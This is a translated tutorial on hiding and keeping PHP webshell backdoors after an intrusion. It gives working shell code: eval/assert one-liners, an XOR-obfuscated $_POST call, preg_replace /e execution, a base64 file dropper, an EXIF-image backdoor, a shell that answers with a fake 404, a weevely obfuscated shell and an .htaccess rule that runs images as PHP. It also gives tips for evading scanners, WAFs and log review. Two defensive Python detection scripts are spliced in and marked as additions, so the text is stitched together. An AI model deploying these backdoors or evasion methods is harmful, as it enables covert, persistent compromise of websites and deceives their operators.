
After a successful test, you usually want to keep the privileges you gained for longer, so the work of leaving backdoors is crucial. The backdoors usually deployed include, but are not limited to, database privileges, web privileges, system user privileges and so on. This article introduces some ideas for hiding common backdoors.


0×00 Preface

After a successful test, you usually want to keep the privileges for longer, so the work of leaving backdoors is very important. The backdoors usually deployed include, but are not limited to, database privileges, web privileges, system user privileges and so on. This article explains some ideas for hiding common backdoors.

Take a PHP web backdoor as an example, offered here to start the discussion.

The most common one-sentence backdoor may be written like this:

    <?php eval($_POST['cmd']);?>

or like this:

    $_POST['cmd']);?>

Of course, these differ only in the function called. For the functions that PHP has disabled, look at disable_functions in php.ini.

But operations staff have many ways to spot our shell intuitively. For example:

◆ finding anomalies through the file name, modification time or size, or by comparing against a file backup

◆ finding it with a webshell scanning script, such as Scanbackdoor.php, Pecker, shelldetect.php and various other scanners

◆ finding the location of the backdoor through the access.log access log

◆ or our test request is blocked by a WAF, which leaves a warning log, etc.

Against these common detection methods, the following seven common techniques for hiding the shell are summarized.

0×01 Bypass

Look at the code of the various backdoor scanners and you will see that leaving a keyword that everyone knows and everyone flags is absolutely not acceptable in a shell.

Common keywords, such as:

◆ System command execution: system, passthru, shell_exec, exec, popen, proc_open

◆ Code execution: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

◆ File inclusion and file operations: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

In the past, a friend cleverly used $_POST[0]($_POST[1]) to execute commands. Unfortunately it is now hard to get this past a scanner, but although that has changed, the ways of constructing the call are endless.

tudouya gave a construction technique on FreeBuf (http://www.freebuf.com/articles/web/33824.html), using:

    <?php
    @$_++;           // $_ = 1
    $__=("#"^"|");   // $__ = _
    $__.=("."^"~");  // _P
    $__.=("/"^"`");  // _PO
    $__.=("|"^"/");  // _POS
    $__.=("{"^"/");  // _POST
    ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
    ?>

Once the construction is generated, of course, if it still looks too obvious, you can write it on one line like this:

    <?php $_++;$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");@${$__}[!$_](${$__}[$_]);?>

The code is now disguised, and a simple "anti-kill" shell sample appears. It executes correctly and bypasses ordinary scanners, and you can also rely on it to write a new temporary shell.

0×02 Feature

Executing commands with the help of syntax features is also an interesting way. It borrows from how PHP processes variables: it checks whether the data inside double quotes contains variables and parses their values, e.g.:

    ${@eval(phpinfo())}

The {} lets variable content be parsed inside double quotes, and @ suppresses the error so that execution continues.

Then you can start constructing the hidden backdoor, but here the construction relies on command execution caused by a function, and yes, that function is preg_replace:

    <?php preg_replace("//e", $_POST['cmd'], "");?>

This method has obviously been put on the scanners' blacklists, so modify it slightly:

    <?php
    function funfunc($str){}
    echo preg_replace("/(.+?)/ies", 'funfunc("\\1")', $_POST["cmd"]);
    ?>

It executes and is not detected. The way it executes is obvious: after the regex matches, the {${phpinfo()}} passed into funfunc causes code execution:

    funfunc("{${phpinfo()}}")

Another method:

    "$arr="".$_GET['cmd']."";");?>
0×03 Inclusion

Everyone has tried every file inclusion method, but there are techniques for inclusion too. An ordinary file inclusion may just be an include of some txt or jpg, or even directly leaving an include vulnerability, but that is easy for a scanner to find, and an extra included file is also easy to find.

Look at this script:

    <?php
    if(@isset($_GET[content])){
        $fp=fopen('README','w');
        file_put_contents('README',"<?php ");
        @file_put_contents('README',$_GET[content],FILE_APPEND);
        fclose($fp);
        require 'README';
    }
    ?>
This can be regarded as solving a small problem. Unfortunately, because functions such as file_put_contents are too sensitive, they are easily discovered by scanning, so encoding is used to create the shell, which is generated on access:
    <?php fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'),'w'),base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));?>

This can evade some scanners, but this pattern also attracts attention, and the newly generated file should also be hidden in some simple way to avoid detection. Of course, newer concepts such as heuristics are not considered here. When this method cannot meet the need, a clever attacker turns back to images:

    <?php
    $exif=exif_read_data('./lol.jpg');
    preg_replace($exif['Make'],$exif['Model'],'');
    ?>

Reference: A backdoor hidden in the EXIF data of a JPG image. This time you do not have to simply use copy /b to generate the image horse; using preg_replace to execute from specific flags of the file also works. This may prompt Call to undefined function exif_read_data(). You need to modify php.ini so that extension=php_exif.dll is loaded after extension=php_mbstring.dll.

It can be seen that this image backdoor relies on the preg_replace e parameter, relies on PHP's variable parsing and execution, uses base64 encoding, and finally relies on file identification to put together a complete shell. It can be regarded as a small reminder for beginners about hiding backdoors.

Of course, as long as there is an include point, the form of the included file is varied, even including error_log (although you may want to consider closing that one); the only limit is what you cannot think of...

0×04 Hiding

In order to prevent visitors from discovering the existence of the backdoor, clever security researchers also confuse things:

(The sample here was an HTML page opening with <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> and a <body> that renders as a 404 page around the PHP; the markup did not survive in this copy.)
With the help of the above HTML rendering, the page as browsed is disguised as a 404 to confuse the viewer.

But this cannot avoid visitors or log analysis. To hide better among a large number of log entries, construct the following script:

    <?php
    header('HTTP/1.1 404');
    ob_start();
    @fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'),'w'),base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));
    ?>
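The script above returns a genuine 404 and is logged as one, so a log-based check has to look at what is unusual about the request rather than at its status. As an added example that is not part of the original article, a Python check over constructed access-log lines (hypothetical addresses and paths) that flags 404 responses given to POST requests, or to .php URLs carrying a query string, grouped by client and path:

```python
import re
from collections import Counter

# Apache/nginx "combined" access log format; adjust the regex for a custom LogFormat.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

def parse_line(line):
    """Split one log line into its fields, or return None if it does not parse."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    fields["path"], _, fields["query"] = fields["url"].partition("?")
    return fields

def suspicious_404s(lines):
    """Count 404 responses that look like a script forging its own status.

    A genuinely missing page is fetched with GET and no parameters; a script that
    sends header('HTTP/1.1 404') itself is normally driven by POST (or by a .php
    URL carrying a query string), so those 404s are flagged per (client, path).
    Returns [((ip, path), count), ...] sorted by count, highest first.
    """
    hits = Counter()
    for f in filter(None, map(parse_line, lines)):
        if f["status"] != "404":
            continue
        if f["method"] == "POST" or (f["path"].endswith(".php") and f["query"]):
            hits[(f["ip"], f["path"])] += 1
    return sorted(hits.items(), key=lambda kv: -kv[1])

# Constructed sample log (hypothetical addresses and paths; the .php name is the one
# the base64 in the article decodes to).
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2025:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2025:10:00:02 +0000] "GET /missing/page.html HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.7 - - [10/May/2025:10:00:03 +0000] "POST /uploads/plugin_m.php HTTP/1.1" 404 0 "-" "python-requests/2.31"
198.51.100.7 - - [10/May/2025:10:00:09 +0000] "POST /uploads/plugin_m.php HTTP/1.1" 404 0 "-" "python-requests/2.31"
198.51.100.7 - - [10/May/2025:10:00:15 +0000] "GET /uploads/lol.php?cmd=phpinfo() HTTP/1.1" 404 0 "-" "curl/8.0"
"""

if __name__ == "__main__":
    for (ip, path), n in suspicious_404s(SAMPLE_LOG.splitlines()):
        print(f"{ip} -> {path}: {n} suspicious 404 response(s)")
```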

The access is a real 404, and yes, so is the entry in the log.

But at this moment the script we want to connect to has already been generated in the current directory.

0×05 Obfuscation

Those who have used the weevely tool should know that the anti-kill shell it generates looks like this:

    <?php
    $penh=
    "sIGpvaW4oYXJyYgiXlfc2xpY2UoJGEsgiJGMoJGEpLTgiMpKSkpgiKTtlY2hvICc8LycgiuJgiGsugiJz4nO30=";
    $kthe="JGEpPjgiMpe yRrPSgidwcyc7ZWNobyAnPCcgiugiJGsuJz4nOgi2V2YWwoYgimFzZTY0X2giRlY2gi9kgiZShwcmVn";
    stwrw_wrwepwlwawcwe");
    $zrmt="JGM9J2NvdWgi50JzskgiYT0gikX0NgiPT0tJRgiTtpZihyZXNldCgkYSk9PSgidvbycggiJgiiYgJGMo";
    $smgv=$ftdf("f","","bfafsfef6f4_fdfefcodfe");
    $rdwm=$jgfi('',$smgv($ftdf("gi","",$zrmt.$kthe.$wmmi.$penh)));
    $rdwm();
    ?>
After connecting from the terminal it looks like the screenshot. PS: I forgot to change the terminal encoding in the screenshot :(

The anti-kill approach is to generate randomly named variables in a fixed area, then use str_replace to assemble base64_decode and the rest of the command-execution chain. Of course, this is obfuscation at the code level to evade scanners; the above uses weevely as the example.

The more commonly used methods of obfuscation:

◆ modify the file time

◆ rename the file and blend it into the folder where uploaded files live, so that file anomalies cannot be spotted visually

◆ disguise the file size (at least make the size look like that of a normal script)

◆ choose a hiding path that is accessed as little as possible

◆ abnormal directories, such as %20 space directories, are relatively easy to find

0×06 Parsing

Use .htaccess to add a parsing backdoor, such as:

    AddType application/x-httpd-php .jpg
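As an added example that is not part of the original article, a small Python scanner for the specific constructions described in 0×01 through 0×06: the XOR assembly of _POST, the ${$__}[...]( call, preg_replace with the e modifier, ${@...} parsing, the base64 file dropper, the exif-to-preg_replace trick, the forged 404 followed by a write, and an .htaccess AddType line that hands other extensions to PHP. The indicator names, regexes and sample inputs are mine, built from the fragments quoted above.

```python
import re

# Heuristic indicators for the hiding tricks described above (0x01-0x06).
# A hit is a lead for manual review, not proof of a backdoor.
INDICATORS = [
    ("xor_string_construction",            # ("#"^"|") style assembly of "_POST"
     re.compile(r'(["\']).\1\s*\^\s*(["\']).\2')),
    ("variable_variable_call",             # ${$__}[!$_](${$__}[$_])
     re.compile(r'\$\{\s*\$\w+\s*\}\s*\[[^\]]*\]\s*\(')),
    ("superglobal_as_function",            # $_POST[0]($_POST[1])
     re.compile(r'\$_(?:POST|GET|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\(')),
    ("preg_replace_e_modifier",            # "//e"; /e was removed in PHP 7.0, so PHP 5 hosts only
     re.compile(r'preg_replace\s*\(\s*(["\'])(\W)(?:(?!\1).)*\2[a-zA-Z]*e[a-zA-Z]*\1', re.S)),
    ("curly_brace_var_parse",              # ${@eval(  or  {${phpinfo()}}
     re.compile(r'\$\{\s*@?\s*[A-Za-z_]\w*\s*\(')),
    ("base64_file_dropper",                # fputs(fopen(base64_decode(...)), base64_decode(...))
     re.compile(r'(?:fputs|fwrite|file_put_contents)\s*\(.*?base64_decode', re.S)),
    ("exif_fed_to_preg_replace",           # preg_replace($exif['Make'], $exif['Model'], '')
     re.compile(r'exif_read_data.*?preg_replace', re.S)),
    ("fake_404_then_write",                # header('HTTP/1.1 404') followed by a file write
     re.compile(r'header\s*\(\s*["\']HTTP/1\.[01] 404.*?(?:fopen|fputs|fwrite|file_put_contents)', re.S)),
    ("dangerous_function",
     re.compile(r'\b(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open|create_function)\s*\(')),
]
# .htaccess line that makes Apache run other extensions as PHP (0x06).
HTACCESS_PARSE_RULE = re.compile(r'^\s*(?:AddType|AddHandler)\s+\S*php\S*\s+(.*)$', re.I | re.M)

def scan_php_source(src):
    """Return the sorted indicator names that match one PHP source string."""
    return sorted(name for name, rx in INDICATORS if rx.search(src))

def scan_htaccess(src):
    """Return the non-PHP extensions an AddType/AddHandler line hands to the PHP handler."""
    exts = []
    for m in HTACCESS_PARSE_RULE.finditer(src):
        exts.extend(e for e in m.group(1).split() if e.lower() not in (".php", ".phtml"))
    return exts

# Constructed samples built from the fragments quoted in the article (hypothetical, not live files).
SAMPLE_XOR = r'@$_++; $__=("#"^"|"); $__.=("."^"~"); ${$__}[!$_](${$__}[$_]);'
SAMPLE_PREG_E = r"""function funfunc($str){} echo preg_replace("/(.+?)/ies", 'funfunc("\\1")', $_POST["cmd"]);"""
SAMPLE_404 = "header('HTTP/1.1 404'); ob_start(); @fputs(fopen(base64_decode($n),'w'), base64_decode($b));"
SAMPLE_BENIGN = r'$title = htmlspecialchars($_GET["q"]); echo "<h1>$title</h1>";'
SAMPLE_HTACCESS = "AddType application/x-httpd-php .jpg .png\nAddType image/gif .gif\n"

if __name__ == "__main__":
    for label, src in (("xor", SAMPLE_XOR), ("preg_e", SAMPLE_PREG_E), ("fake404", SAMPLE_404), ("benign", SAMPLE_BENIGN)):
        print(label, scan_php_source(src))
    print("htaccess", scan_htaccess(SAMPLE_HTACCESS))
```

Run it over every file in the web root (and every .htaccess) after the file-time, size and name comparisons above, since those are exactly the checks the obfuscation list tries to defeat.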
0×07 Combination

To summarize the above methods, most of them are nothing more than a process of constructing a vulnerability. Code constructed from a vulnerability can be as strange as any backdoor; you can write something delicate and elegant, or something simple and crude, but the situations each applies to differ. Integrating these ideas well and constructing your own hidden shell is not difficult. The above is just a summary of experience; if you have interesting ideas, please feel free to share them.

The above introduced PHP backdoor hiding and maintenance techniques, together with related content. I hope it is helpful to friends interested in PHP tutorials.
